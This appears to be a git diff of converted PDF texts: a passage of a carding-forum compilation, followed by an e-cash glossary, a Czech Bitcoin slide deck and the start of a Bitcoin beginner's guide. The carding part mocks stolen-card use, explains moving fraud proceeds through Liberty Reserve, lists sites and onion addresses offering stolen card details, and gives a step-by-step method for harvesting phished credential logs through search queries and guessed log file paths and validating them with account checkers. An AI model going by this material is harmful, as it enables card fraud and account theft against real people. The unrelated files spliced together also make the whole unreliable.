ANYWAY!!! OH NO OH NO +OH NO I SAW A SHOW ON CNN ABOUT THIS KIND OF THING MY CREDIT IS GONNA BE +RUINED!!! +5. IRATE +"you son of a BITCH... how DARE you say my card has to be VERIFIED i KNOW there?s enough +FUCKING credit on the GOD DAMN CARD IM A DOCTOR YOU IMPOTENT PIECE OF DOG +SHIT... Ill have your job for this you puny miniscule pre pubescent FUCK! GIMME THAT GOD +DAMNED CARD BEFORE I SHOVE IT UP YOUR ASS!!!! Its ALWAYS SOMETHING... +ALWAYS ... if its not the Porsche throwing a rod its the Mercedes leaking oil... if its not the WIFE +FUCKING THE POOL BOY ITS THE WIFE FUCKING MY GOD DAMNED WORTHLESS +BROTHER!!!! FUCK IT ... JUST GIMME THAT CARD BACK AND EAT A DICK...SHIT!!!!!!!! +6. Honest +"well that would probably be the credit card company telling you the card is stolen bro... Im surprised its +lasted this long.. haha call them and see what they say.. tell them i left or some shit... yeah the person that +owns this card is up shit creek without a raft to float on if you know what i mean... haha well i guess ill be +back when i get another one..oh.. no i dont want it back dog just keep it leave it for some dumbass to find +and try and use it... boy wont he be surprised" + +Simple tut for members about liberty reserve +Ok here it is a simple tutorial for members (mainly new members) +that dont know how to use Liberty reserve +i know some of you will say this is simple but +sometimes thing need to spelled out for our newer members +Question 1 +What is Liberty Reserve ?. +Answer . +Liberty Reserve is an account-based payment system where you can store value in U.S. Dollars, Euro or +Gold Grams and transfer payments to others and receive payments from others. It is safe, reliable and +confidential. Payments are irrevocable (meaning they cannot be reversed). Liberty Reserve is instant, +real-time currency for international commerce. In just minutes, you can send and receive payments from +anyone, anywhere on the globe! +Question 2. +how do i register with Liberty Reserve ?. +Answer. +You can Register and account here http://libertyreserve.com +Account registration +Creating an account is easy at Liberty Reserve. Simply enter your details, such as your name, account +title, and address, etc., and you will have a full-functioning, free Liberty Reserve account in minutes. +Remember to write down all the information for future reference such as your Login PIN, Master Key, +password, account number, etc. +Logging in +Once you create a Liberty Reserve account, you may access your account by logging in with your account +number, password, and login PIN in order to access the value in your account and make payments, check +history, use the internal messaging system, etc. +Profile settings +Once you are logged into your account at Liberty Reserve, you can click on "profile" and change your +account name, contact information, etc. On 'Settings' section you can change password, Login PIN, +Master Key, CWM and other features, such as email notifications. +Transfer +This feature allows you to send funds (make payments) to any other Liberty Reserve account instantly. +Withdraw +You can withdraw (redeem) value from your Liberty Reserve account by using any number of +independent exchange providers Usually, exchange providers will have an account number starting with +the letter, "x". + +Exchange providers are not affiliated with Liberty Reserve and your dealings with them are at your own +risk. +Deposit +You can deposit funds or value to your Liberty Reserve account by using any number of independent +exchange providers +Exchange providers are not affiliated with Liberty Reserve and your dealings with them are at your own +risk. +Internal messaging +Once you are logged into your Liberty Reserve account, you can send private messages to anyone else +with a Liberty Reserve account. All you need to know is their account number. You can also check your +message inbox to see if you received any messages, and you can save messages. This is a private, internal +messaging system developed exclusively for Liberty Reserve account holders +Question 3. +Were can i Load my liberty Reserve account +Answer. +The simplist and fastest way to load you liberty reserve account with funds is to use UKASH +Which can be bought in most shops and convenience stores in europe america and bassically all over the +world +check this link to find out were is the nearest place to you that sels ukash +http://www.ukash.com/uk/en/where-to-get.aspx# +Once you have found a place to buy ukash you will need to exchange it to Liberty reserve +there is many exchangers online who can do this for you you +(example) http://ukashtoliberty.com +go to whatever site you choose to use and fill in the details +and they will convert your ukash to liberty resrev and deposit directly into your liberty reserve account +Question 4. +now i have liberty reserve how do i spend it +Answer. +You will need to know the account number of the person you are sending it to (example) U12345XX +Go to the transfer section of your liberty reserve account and fill out the details required +the amount and the Liberty account number you want to send it to +and press send +you will be redirected to a page confirming you payment has been sent +giving you a batch number connected only to that specifc payment +i hope this simple tutorial explains how to use Liberty reserve +if you are having any problems doing this post your questions here and me or someone else +will answer them for you +***NEVER SEND ANYONE WESTERN UNION UNLESS THEY ARE A REGISTERED E- +CURRENCY CONVERTOR****** +AND DONT ALLOW ANYONE HERE FROM THIS OR ANY FORUM TO MAKE A CONVERSION +FOR YOU +IF YOU CANT DO THIS BY YOURSELF AFTER READING THIS TUTORIAL MAYBE YOU ARE +NOT MEANT TO BE DOING THESE KIND OF THING IS NOT FOR YOU + +Sites to get you Credit Card Details from. +• https://drk.bz +• http://carderbase.su/ +• http://anonnews.org +• http://cardingplanet.biz/ +• http://freecc.mboards.com/1940634-free-cc-fresh-dumps-track-1-2/ +• http://qhkt6cqo2dfs2llt.onion +• http://elitezone.forumotion.bz +• http://karder.4umer.com +• http://mxdcyv6gjs3tvt5u.onion +Stealing from phishers +I was amazed, it is so easy. +Here is how you do it: +Contents: +Step 1 (Finding hosts) +Step 2 (Getting logs) +Step 3 (Other way to get logs) +Step 4 Check the quality +Step 5 Enjoy +Step 1 +You need a list of hosters phishers use. Search for free hosts which allow php. In this tutorial I will be +using malware-site.www( site down) , which is used a lot by phishers. +Step 2 +Getting logs. + +Choose a site from the list made in step one. Go to google and search for: +Code: +site:malware-site.www filetype:txt +Now the results will show .txt files on that hoster. Go through the results and you will find phishers soon. +Open them and save them. Congratulations, you stole from a phisher! +Step 3 +However most of the time the hoster will have shut down the phisher. There is a nice trick for this. Just +use googles cache. I love the cache <3! Then save, and you stole from the phisher! +Step 4 +You need to check the quality. For this you can randomly choose accounts and try them. But a better +method are account checkers. You insert your list there and that program checks all of them for you. They +are great. Just search for them, Let them check, and save the accounts that work. +Step 5 +Now have fun. +Also if you find a phisher you should try: +www.site.com/log.txt +www.site.com/log_.txt +www.site.com/_log.txt +www.site.com/defaultlog.txt +www.site.com/lol.txt +www.site.com/lolz.txt +etc You might get lucky! +Terminology of payment systems +Abandon Trial – (Purse) In some (trial) versions of the ecash Purse the Abandon Trial function is +provided. After confirming the instruction the Purse will Cancel any outstanding Payments, Deposit the +ecash held by the Purse, and instruct that the Account status be changed to ‘disabled’. Thereafter the +Account cannot be used. +Abort Transaction – (cf. Cancel Transaction) In some versions of the ecash Purse the Abort function is +provided to stop the exchange of messages, and send a message which requests a roll-back to the start of +the protocol. The software can then verify whether the transaction has been successfully aborted. This + +function is not included in all software versions, and, given the time/sequence factors and the general +complexities of Internet protocols, it cannot always be successful. +Accepted – (The Transaction Status is indicated for each transaction in the Transaction Log). A +transaction is assigned 'Accepted' status after execution has been acknowledged or verified. The +'Accepted' (or 'OK') status is regarded as the default and shows no icon in the appropriate field (see +Transaction Status Icons). +Account (ecash Account) – A Purse-holder's (digital) Account with a Mint (sometimes known as a Safe). +For an ecash client to function, each Purse-holder must have one or more such Accounts at an operational +Mint run by an ecash Issuer. Each Account is in a specified currency. An ecash Account may be +maintained separately or as a feature of an existing conventional bank account or credit card, etc. Purse- +holders can open one or more ecash Accounts with one or more Issuers, and may therefore own several +Account IDs. +Account ID – The Account name on a digital Account. (Although this may include any combination of +alpha-numeric characters such as an email address.) The Account ID is not necessarily globally unique +(although it assumed to be so when concatenated with the Issuer ID) (see also email address, below). +Account Number – A unique number within the Mint which (in conjunction with the Mint Number or +Mint ID) serves as a globally unique identifier. +Account Status – Each Account is associated with one of the following states – Enabled, Disabled or +Unused. +Accounts Window – (Purse) The main ecash window includes an overview of Mint and Purse balances +and presents buttons which access basic functions such as Withdrawal, Deposit and Refresh Coins. +API – The Application Programmer's Interface provides tools for software developers who are +implementing ecash applications. +Authentication – A procedure to verify that the originator of a message is the same as the sender that is +stated. (cf. verification, integrity, uniqueness). +Authorisation string – A set of data fields that contains the authorisation to transfer money from an +Account. +Back-up – The ecash client tries to retain 100% consistency with the records of the issuing Mint; +therefore it is not advisable to back up the client data-files locally. Do not make copies of ecash data-files +except as part of one of the procedures documented in the manual. If a local crash occurs (causing loss of +data on your PC) you should use the Recovery procedure as documented (which bases the Recovery on +files kept by the Issuer's Mint). +Balance Limits – Variable factor which can be used by the Issuer to set the upper (and lower) limits of +cash which can be held in an ecash account. Bank Withdrawals which would result in an excessive +balance (high or low) will be rejected by the Mint with an explanatory message. +Bank – The Bank is the institution which underwrites the value of its own bank-notes. An ecash-issuing +bank is called an Issuer. An Issuer runs a computer to produce electronic coins. This computer and its +ecash software are referred to as the Mint. +Bank Deposit – (cf. Deposit) The transfer of funds from the ecash Mint Account to the Bank Account (as +distinct from a Deposit; which is a transfer from the Purse to the ecash Mint Account). +Bank Withdrawal – (Purse) (cf. Withdrawal) The transfer of funds from the (conventional) bank account +to the ecash Account at the Mint (as applicable to Issuers where these two accounts are separately + +identified). In contrast, the term Withdrawal is used to indicate transfer of funds from an online (Mint) +account to the Purse (client). +Base Coin Value – The lowest value of coin in any particular Coinage. See Coinage (below). +Blinding Factor – (Purse) The essential element for anonymous Payment systems. The Blinding Factor is +calculated into the coin number by the user before it is sent to the bank for validation. It is subsequently +removed again before the coin is used in a Payment. Thanks to the blinding factor, the number which was +signed (by the Mint, during a withdrawal) cannot be associated with the number which was returned (to +the Mint, during a Deposit), although certain unique (mathematical) characteristics have been retained. +Cancel Payment – (Purse) If a Payment of digital coins has been Deposited by the payee at the Mint then +it is not possible to Cancel Payment. However by reporting the coins as invalid and proving the user's +identity as the legitimate owner of the coins, the system will accept cancellation of unredeemed coins. +Coins used in a specified Payment are invalidated by the cancellation procedure, and will be refused if +they are subsequently presented to the Mint. In order to Cancel coins the user must prove ownership by +revealing the coin number and thereby surrender a limited degree of anonymity. +cb$ (cyberbucks) – Trial currency with no real value (as used in trials of ecash). +CGI – CGI scripts are used to provide certain ecash server functions. Specifically they are used in +implementing the shop's charge script and providing other configuration options. +Change Password – (Purse) Providing that the user can enter the current (Mint or Purse) Password, this +procedure will allow them to change it. The same string must be entered twice in order to confirm the +change. +Charge Script – (Merchant) The shop is constructed so that it can take input about the items to be sold and +calculate a price. The CGI script refers the input information to a charge script. The output from the script +(i.e. the price) is then referred to the Payment Request mechanism which sends a message to the client +requesting Payment. +Coin – The ecash payment method is based on Coins – a Coin is the digital equivalent of a traditional +coin and similar in that it has a specified value, but carries no 'imprint' to identify the (current) owner. +Unlike traditional coinage, the Coins, once received by the Merchant's Purse, cannot be passed directly to +a third party, but have to be Deposited at the Mint first. +Coin Distribution – (Purse) The Purse tries to keep an assortment of coin denominations so that the +number of possible Payment amounts is optimized. Typically it will try to ensure that there are sufficient +coins to complete at least 8 transactions of the lower values. (See also Refresh Coins). +Coinage – A set of digital coins issued by the Mint and designated with the same Coinage Version +Number. Each Coinage issued by the Mint is based on a set of defined values including the Currency, the +expiry dates, the number of coins in the series and the Base Coin Value (the value of the first / lowest +value Coin in any Coinage), It is linked to a specified set of Coin Keys. +Coin(age) Expiry Date – Each Coinage Version expires according to a Phased Expiry Schedule (see +below) which specifies the dates on which all Coins made in a specified Coinage will cease to be +functional. After the expiry date the ecash client software waits for a connection to the Mint (i.e. the next +Check Mint, Deposit or Withdrawal transaction), and exchanges expired coins for freshly minted ecash. +At a later date (determined by the Issuer) it will become necessary to make a special request to the bank, +and the Issuer may require some time to check the validity of the expired coins before they can be +reissued. +Command Line – Non-graphic clients (used for ecash by Merchants and some UNIX users) are operated +using a series of key commands entered in text mode. This type of interface is also used in MS DOS to + +configure system executables. The application presents a prompt and responds to the input command +directly. +Confidentiality – The property of a message such that it cannot be decoded or read by an unauthorized +third party. +Crash – see Recovery +Create / Terminate Account – In order to maintain a clear distinction, the terms Create (and Terminate) +are used to describe the procedure by which ecash Accounts are defined and established at the Mint. +Following a request from the user an Account is assigned or 'Created'. When the Set-up Protocol is +performed, the Account receives an opening transaction and becomes 'enabled'. If the Account is to be +removed from the system then it should first be 'disabled' (so that no new transactions are possible), then +closed (including the removal of any outstanding balance) and then 'Terminated' (i.e. removed from the +Mint's Account Database). Thereafter the Account will no longer exist. +Currency – All ecash money is denoted in a currency. The currency might be an existing 'real-world' +currency, such as the US dollar, or the Dutch guilder, but ecash is not restricted to existing currencies. +Alternatively, the currency might be a precious metal, stocks, bonds, futures, coconuts, e-miles, airmiles, +oil or any other trading item. Strictly speaking, the currency is also defined by the Issuer and the +currency-fraction (also known as the 'granularity'). Thus, dollar amounts are represented in cents (1/100th +of one dollar), and oil amounts are represented in (full) barrels. Each currency is defined by a unique +Currency ID. (See also Coin Denomination Distribution). +Denomination – The integer value of a coin, expressed in the currency-fractions. +Deposit – (Purse) (cf. Bank Deposit) The sending, by the Purse, of (a number of) ecash Coins to the ecash +Account. These may be Coins which have been received as Payment (i.e. 'Deposit Payment') or Coins +stored on the Purse-holder's hard disk and not spent(i.e. 'Deposit Cash'). The Purse software also renews +any expired Coins by Depositing them at the Mint and making an equivalent Withdrawal. +Digital Signature – A technique using Public Key Cryptography that allows one party (the signer) to +attach a digital signature to a (digital) message. The signature can only be created by the signer, and all +other parties in the system can verify that the message was indeed signed by the signer. Digital signatures +are mainly used to provide Authentication. +Disable Account – Although some clients can access this function via the Abandon Trial routine, the bank +is usually directly responsible for the ecash Account status recorded at the Mint. It can be changed using +the various Mint Management interfaces. +Email Address – If you wish to change email addresses you should inform your Issuer (whose policy may +require that the Account ID is also changed accordingly). Merchants are assigned a more complete +corporate description as ID. An Account ID such as 'J.R. Smith (Engineering) Ltd.' is a clearer identifier +than the accompanying email address (e.g. smith@net.co.uk) and helps to ensure that customers send +their Payments to clearly identified Merchants. +Encryption – Process by which information is encoded , so that it can only be read by the holder of the +appropriate decryption key. Encryption is used to provide confidentiality of messages. +Error Codes – Error codes comprise an explanatory message and (in some clients) a numerical reference. +The online help page refers the browser to an explanatory text for each message. Error codes are also +listed in the Purse User manual. +(Purse) Event Log – The log which records the message exchanges and protocol execution of the ecash +client. This log is useful when an error appears to have occurred and can be accessed from the ecash +software in most instances. + +(Mint) Event Log – Log which records the activity of the Mint, unsuccessful attempts to contact it and +aborted protocols. It also maintains a list of completed transactions. +Expired Coins – Coins which have passed their pre-determined expiration date are detected by the Purse +software. They are automatically exchanged for fresh coins during the next Withdrawal or Deposit +transaction (or manually when the 'Refresh Coins' function is used). +Filter – A range of functions which can be used to sub-divide the entries in a Transaction Log, so that +only transactions which fall inside the user-specified parameters are shown in the listing. The filters can +be used to list transactions of a particular type (e.g. Payments) or to establish a range of dates. +Firewall – A firewall is a computer which is placed between a local network and the Internet. Its main +function is to restrict the types of connections which can be made. Operating ecash client software from +behind a firewall (whether Merchant or end-user) usually requires some degree of additional installation +or configuration. Information about this is provided in the appropriate manuals. +Generate Keys – (Purse) The Account is supplied to the customer along with a Set-up Password. Once +this has been correctly entered, the client asks for random data, some of which is used to generate a +unique pair of keys. This process can take several minutes on PCs with slower processors, during which +time no activity is shown on the screen. +Global ID – A name which is globally unique can be constructed by adding a unique external address +(such as Mint ID, email address or IP address) and an internally unique address (such as Account +number). +Hash – A basic cryptographic function. A hash function is a form of checksum on a large message. The +basic property is that it is not computationally feasible (i.e. impossible in practice) to find two different +messages whose hash value is the same. Even the smallest change in the sequence of characters results in +a dramatic shift in the hash value. +Integrity – The property of a message such that it is possible to verify that it has not been changed or +altered by any third party. (cf. verification, integrity, uniqueness). +Issuer (ecash Issuer) – An ecash Issuer is an institution that provides digital Accounts, by operating a +Mint (ecash 2.3). It has its own keys for issuing Coins. There may be more than one Issuer in the system. +The Issuer underwrites the value of the money in the Accounts and of the Coins it has issued to all other +parties in the system. +Key – Any security code which can be used for authentication and encryption purposes by the software. +Key Version Number – A number uniquely identifying the key. When several keys are in use (e.g. while a +new key is being introduced) this identifies the key that was used in signing or encrypting the message. +Logs, Databases and Reports – A database is a file which holds information in a pre-configured matrix. +Each line of a database file is called a record. (i.e. A record may contain details of an Account, of a +Transaction, or of some other 'Mint Event') A Log is an open-ended file which automatically collects and +retains some (sub-set or supra-set) of these records in chronological order (Transactions Log, Mint Event +Log). Criteria for logging may be pre-configured in the software (e.g. The Purse-holder's Transaction Log +includes only the transactions on the named customer's account) or specified as part of the Log creation +procedure (e.g. parameters are usually inserted at the command line for generating Mint Logs and +Reports). A Report is a sub-set of a Log (which is normally up-to-date at the time of generation) and may +include checksums, totals and other arithmetical checks for consistency and auditing purposes. As an +alternative to reporting, logs may be 'rotated' (i.e. removed to storage and replaced with an empty file in +which the log entries will continue). + +Merchant – A Merchant is a Purse-holder (consumer, retailer, shop or service provider) who accepts +Payment from other Purse-holders. The Merchant who runs a 'cybershop' will also use shop software +which will, in response to user input, generate a Payment Request which is sent via TCP/IP to the +customer. If the customer agrees, and returns a Payment message, the Merchant's Purse will Deposit the +coins at the Mint (online) and wait for the "Deposit Accepted' message before releasing the goods to the +customer. A Merchant is simply a Purse-holder who happens to be receiving the Payment. The shop +software adds functionality so that a 'cybershop' can generate and send Payment Requests (using the shop +Charge Script) and accept ecash Payments (i.e. Deposit and verify them) automatically. +Merchant ID – A human-readable string used to identify the Merchant's Account in a Payment. See +Account ID. +Merchant Purse – The Merchant client is provided with a text-mode interface containing some additional +functionality. Unlike the ordinary (end-user) Purse, the Merchant client will also create Payment Requests +upon demand, automatically send incoming Payments to the Mint for Deposit. +Mint – Version 2.x of ecash features Issuer software called Mint. The name derives from its primary +function, the issuance of digital Coins. The Mint can also handle Accounts and transactions, although +these are usually managed from a separate computer. +Mint Account – (syn. ecash Account) The Account from which ecash can be withdrawn is also known as +the ecash Account. The designated ecash Account is not always a conventional Bank Account, but may +be ( for instance) a separately numbered ecash Account at the Mint or a credit card. +Mint ID – In order to ensure that each Mint has a unique identifier and can be uniquely verified, each +Mint is provided with a unique number which is included in all encrypted messages to and from the Mint. +Mint Password – (Purse) The Password which the user must enter at the Purse before being able to access +the ecash account at the Mint. The Mint Password is therefore required when making a Bank Withdrawal +or Bank Deposit. +Network Port – Several parts of the ecash system may require that specific controls are adjusted to +indicate network port addresses. This is generally associated with ecash (Purse) software which is being +operated from behind a firewall, or ecash shops which are linked to an integration. +Numbe (cf. ID cf. Name) – Frequently used data, such as Account holders, and Transactions, is held in +two forms. The numeric form is suitable for the computer, and more easily capable of generating a unique +identity for the user. The ID (alphanumeric) form should be text-based (e.g. Name), and bear a clear +relationship to the name (and perhaps location) of the Account holder, however this may not be easy to +make globally unique and therefore lacks the secured uniqueness of the Number. +Password – When new accounts are created the Mint assigns a Set-up Password which must be passed +securely to the Purse-holder. Once this has been used to authenticate the new Purse-holder online, it is +supplanted by Mint and Purse Passwords of the Purse-holder's own choice. The unchangeable Recovery +Password is generated from random data during the Set-up of each account. This Passsword string must +be entered exactly before any Recovery can be initiated. +Paste – Payments of ecash can be included within many different file formats. Select the text area which +includes the payment and select 'Copy' (from the Edit Menu) so that the data is placed on your clipboard. +Now open your Purse and select Paste (at the top of the Payments Window). Ecash will try to retrieve the +coin numbers. The Purse is usually able to ignore other text characters which are part of the message or +the application formatting. If the coins are successfully retrieved from the message then you will be +presented with a deposit dialog. +Payment – The process of sending a Payment instrument from the Purse to the Merchant, and +acknowledgment of the Payment by returning a message to the Purse. + +Payment Description – A descriptive string chosen by the Purse-holder and coupled to a Payment. The +Payment Description is shown to the Payee (and appears in the Transaction Logs of both parties) and may +be used to identify the Payer (if desired) or to provide a text to accompany the Payment. +Payment Request – A message requesting Payment of a specified amount which is sent by a Merchant +Purse-holder. The Payment Request includes details of the Account to which Payment should be sent and, +in the message field, may include specifications of the goods or services which will be supplied in +exchange. The recipient needs only click on one button to agree to Payment and the rest of the process +can be handled automatically. +Phased Expiry Schedule – Coins expire in phases according to the specifications of the Coinage to which +they belong. The dates for each stage in the expiry are specified in the Coinage Version. After the first +expiry date, Coins can no longer be used in Payments but can still be Deposited back into the Purse- +holders Account or exchanged for new Coins of equal value. After the final Expiry Date the status of the +digital Coins becomes similar to obsolescent bank-notes; i.e. the coins are obsolete and must be submitted +to the Issuing Mint for scrutiny before any reimbursement is offered. +(Payment) Policy – (Purse) In some versions of the Purse, the user is provided with functionality which +allows them to express a policy for receiving Payments. This can be used to instruct the Purse software to +' Automatically accept all incoming Payments'. +Private Key – The security key-code which can be used for signing and/or decrypting messages. The +Private Key is kept secret by the party that created it. +Public Key – The security key-code which can be used to encipher messages or verify signatures that +have been created with the associated private key. +Public Key Cryptography – Also known as asymmetric cryptography, the system uses one pair of keys +for each user which are designated as Public Key and Private Key. Among its better-known forms are +RSA, used in the S.W.I.F.T. system and similar protocols, and the American DSS (Digital Signature +Standard). +Purse – The ecash software for the end-user. The main role of the Purse is to protect the interests of the +Purse-holder. The Purse takes care of all administrative and cryptographic tasks, and provides a friendly +user-interface to the Purse-holder. +Purse-holder – A real-life person or other legal entity that has at least one Account with an Issuer. +Purse Password – The Password created by the user which protects access to the Purse and prevents an +unauthorized user from spending the contents of the Purse. +Purse Window – The Purse window shows the ecash toolbar and currency diff --git a/Bitcoin-za_klady-a-stavebni_-kameny_pdf.md b/Bitcoin-za_klady-a-stavebni_-kameny_pdf.md new file mode 100644 index 0000000..4a4bbf9 --- /dev/null +++ b/Bitcoin-za_klady-a-stavebni_-kameny_pdf.md @@ -0,0 +1,151 @@ +# Bitcoin-za klady-a-stavebni -kameny + + +--- + +Bitcoin–základy a stavební kameny +Co o něm nevíte a neměli jste se koho zeptat... +Karel Fillner +cointelegraph.cz +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Bitcoinv o čích veřejnosti a médií +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Co je bitcoindoopravdy +• SatoshiNakamoto–2009 (p ředtím např. Egold1996 +USA, centralizovaný projekt). Nutnost důvěřovat +prostředníkům je nahrazena kryptografií a P2P +• Decentralizovaná peer to peer síť (Bitcoinvs. bitcoin) +• Open-source program a komunitní projekt +• Projekt krytý největší výpočetní silou +• Pseudonymní digitální měna (komodita?) +• Internet 2.0 -Money 2.0 +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +FIAT vs. BITCOIN +• FIAT – měna s nuceným oběhem, zákonná měna +• Bitcoin- m ěna spravovaná bez centrální autority +• Pilířem je státní monopol a garance vlády a CB +• Pilířem jsou matematické zákony a výpočetní síla +• Lze je dotisknout, devalvovat, znárodnit +• Postupně uvolňovaný přesný počet 21 milionů +• Účty lze obstavit, zabavit x BTCadresa je skrytá +• Fin. transakce jsou vratné x BTCtransakce nevratné +• Kvalitní padělky lze těžko rozeznat x Nelze jej padělat +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Praktické vlastnosti bitcoinu +• Založení účtu nic nestojí, neomezený počet adres +• Vlastník bitcoinů není známý, pokud sám nechce +• Účty a transakce jsou však veřejné a dohledatelné +• Pro přijímání bitcoinů není nutný internet +• Transakce nelze změnit, vrátit ani jim zabránit +• Poplatky jsou levné pro libovolnou částku +• Bitcoinovousítí lze nahradit registry a ov ěřovací +autority –notá ř, katastr, pravost zboží, volby +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +18BSM9B1dZTMGcLfs2Dck868fjgwrwhjk4 14MLqx6LeKZkxPSaKPxyekM4Nh77P1CiQ1 +www.blockchain.info +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Jak probíhají transakce a mining +Potvrzení transakce – časové Blockchain–1 blok cca 10 minut, +razítko na bloku + 25 BTCodměna difficulty-samoregulace +Hash: +0x000000000000000015e30e78a09861d +e434a999d82fc43ad5231e7d58fce81d4 +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Bitcoinadresa a pen ěženka +• Bitcoinadresa: 14MLqx6LeKZkxPSaKPxyekM4Nh77P1CiQ1 +• Online peněženky –Coinbase, Blockchain.info +• Softwarové peněženky –BitcoinQT, Electrum, Multibit(liší se +také v načítání blockchainu) +• Hardwarové peněženky –nap ř. TREZOR +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Mobilní peněženky +Mycelium Blockchain bitWallet CoinPocket Green Address +Paperwallets +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Kde se dá bitcoinkoupit a prodat +Burzy a směnárny +ČR –BitStockvs. Simplecoin +Evropa –Bitstamp, btc-e (Bulharsko) +USA –Bitfinex, Kraken, Coinbase +Čína –BTCChina, OkCoin, Huobi(až 70% trhu) +Altcoinburzy –Cryptsy.com, Bittrex +Bitcoinovébankomaty +Klientské centrum Praha –wbtcb.com ++ EasyCoin +Localbitcoins.com +Jak ještě bitcoinzískat +Mining +Prodej zboží a služeb +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Kurz bitcoinu, volatilita 2013-2014 +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Kurz bitcoinu, volatilita -2011 +WikiLeaks–Julian Assange +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Konec bitcoinu? Dnes 47x … +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Lineární graf 2009 -2014 +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Logaritmický graf 2010 -2014 +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Bitcoina legislativa, regulace +• Bitcoinjevhledá čkuzájmudonucovacíchorgán ů,da ňových úřadů a +právníchregulátor ů,znichžvšichnisesnažípochopit,jakkryptom ěny +zapadajídostávajícíchrámc ů.Zákonnostbitcoinovýchaktivitzávisínatom, +kdojste,kdežijete,acosním d ěláte. +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Bitcoinv České republice +ČNB–únor2014 : Nákup čiprodejbitcoin ů navlastní ú četnep ředstavuježádnouzplatebních +služebpodle§3odst. 1ZPSanibezhotovostníobchodscizí m ěnou[§2odst. 1písm.e)ZPS]….… +Obchodovánísbitcoinyprotonevyžadujepovolení ČNB(takovépovolení ČNBaninem ůžeud ělit) +anepodléhádohledu ČNB.Ztohotohlediskaseneuplatníaniinforma čnípovinnosti v ůči ČNB. +Povolení ČNBnenípot řebnéanik p řijímáníúhradzbožíaslužebprost řednictvímbitcoin ů.Jevšak +třebaupozornit,žesoustavnéodmítánítuzemskýchbankovekamincíbymohlonaplnitznaky +skutkovépodstatytrestného činuohrožováníob ěhutuzemskýchpen ězpodle §239odst.2písm. +a)trestníhozákoníku,kterýstíhátoho,kdobezzákonného d ůvoduodmítátuzemsképeníze. +• V ČRcca100akcepta čníchmíst,Prahacca50 +• 8bitcoinovýchbankomat ů,3obousm ěrné +• WBTCB–EasyCoin –8.000místSazka a Českápošta +• ParalelníPolis–bitcoinovákavárna,HUB,hackerspace +• silnáBTCkomunita +• Našpi čce vtechnologiích–Slushpool,Trezor +www.coinmap.org +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +Budoucnost bitcoinu +• Přílivinvestic(VC)dorozvojetechnologií aslužeb +2012-2milionyUSD2013-93mil.USD2014-390mil.USD +• Coinbase–leden2014–75milion ů USD, březen116mil.USD +• Vzniknových(regulovaných)sm ěnáren(Winklevoss–Gemini) +• Další akceptace BTC velkými společnostmi (nyní Dell, +Microsoft,E-Bay,dalšína řadě jePayPal) +• E-shopy,obchody,restauracemi–nynícca100tisícmíst +• Zlepšeníuživatelské p řívětivosti, důraznabezpe čnost +• Pokračovánívelkévolatilitynatrzích,200–2000USD/1rok +(situacenatrhuEUR/USD,hyperinflace-Ukrajina, Řecko?) +• Rozvojnovýchtechnologiía m ěnnaplatform ě blockchainu +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com + +DOTAZY? +Další informace o bitcoinu +www.cointelegraph.cz +www.btctip.cz +www.paralelnipolis.cz +e-bookzdarma – www.btctip.cz +PDF vytvořeno zkušební verzí pdfFactory www.pdffactory.com diff --git a/Bitcoin_Step_By_Step_2nd_Edition_pdf.md b/Bitcoin_Step_By_Step_2nd_Edition_pdf.md new file mode 100644 index 0000000..594188a --- /dev/null +++ b/Bitcoin_Step_By_Step_2nd_Edition_pdf.md @@ -0,0 +1,1063 @@ +# Bitcoin Step By Step 2nd Edition + + +--- + +Bitcoin +Step by Step +Author: Michael Caughey +© Copyright Michael J Caughey 2012. All rights reserved. +eBook Dowloaded From: www.Book-Experts.org + +I dedicate this book to +the developers of the software, +the designers of the mining rigs, +the miners digging for BTC blocks that keep the network alive, +the exchanges and services that tie non BTC to BTC so this market can coincide with traditional +markets, +the old hands that continue to help others enter the marketplace, +the newcomer who will be an old hand soon enough, +the merchants that use BTC in their Markets, +the depositors, +Cindi for editing this, +and my wife who realizes that I have BTC fever. +-Michael + +Contents +Introduction +What Is A Bitcoin? +Bitcoin Storage +Bitcoin Exchange +Funding Your Market Account +Extracting Funds to Government Backed Currency +Bitcoin Transactions +Other Transaction Types +Bitcoins in Action +Earning Bitcoins +Bitcoin Underbelly +Appendix A: Other Resources +Appendix B: Bibliography + +Introduction +The goal of this book is not to be the complete guide to Bitcoin (BTC). This eBook is meant to +get the new user up to speed quickly and safely. The user should be able to have a secure +wallet, buy and sell BTC, accept and send BTC with the same level of trust and confidence as +the existing user base. +There are many people before me that put a lot of hard work into documenting everything +there is to know about Bitcoins. My goal is to condense all that into something that will get +you up and running quickly. If you are the type of person willing to take the time and make the +mistakes, you can figure it out without this eBook. I had it figured out in about three weeks of +research and something like 80 to 100 hours of time. There has been even more time added +since then. I hope to fast track your user’s experience and get you using the BTC infrastructure +as easily as possible. The goal is to get you up to speed and using the Bitcoin network in the +time that it takes you to read this eBook. +I will make references throughout the eBook to a number of additional resources that expand +on the information that I’m giving you. Often times I will point to the wiki site. Throughout +many places in the eBook, there are screenshots from copyrighted sources. I did obtain the +written permission to include the screen shots. I hope you will visit the sites referenced in the +eBook. + +What Is A Bitcoin? +A Bitcoin is a unit of measure in an online currency exchange system. Unlike government +backed fiat, such as the USD, there is no government or central owner of the BTC (Bitcoin). A +Bitcoin is traded within a peer to peer network which uses cryptographic processes to build +trust around each transaction, thus building proof of ownership for your BTC. According to the +Bitcoin wiki site: +“Bitcoin is an experimental new digital currency that enables instant payments to anyone, +anywhere in the world. Bitcoin uses peer-to-peer technology to operate with no central +authority: managing transactions and issuing money are carried out collectively by the +network. Bitcoin is also the name of the open source software which enables the use of this +currency. +The software is a community-driven open source project, released under the 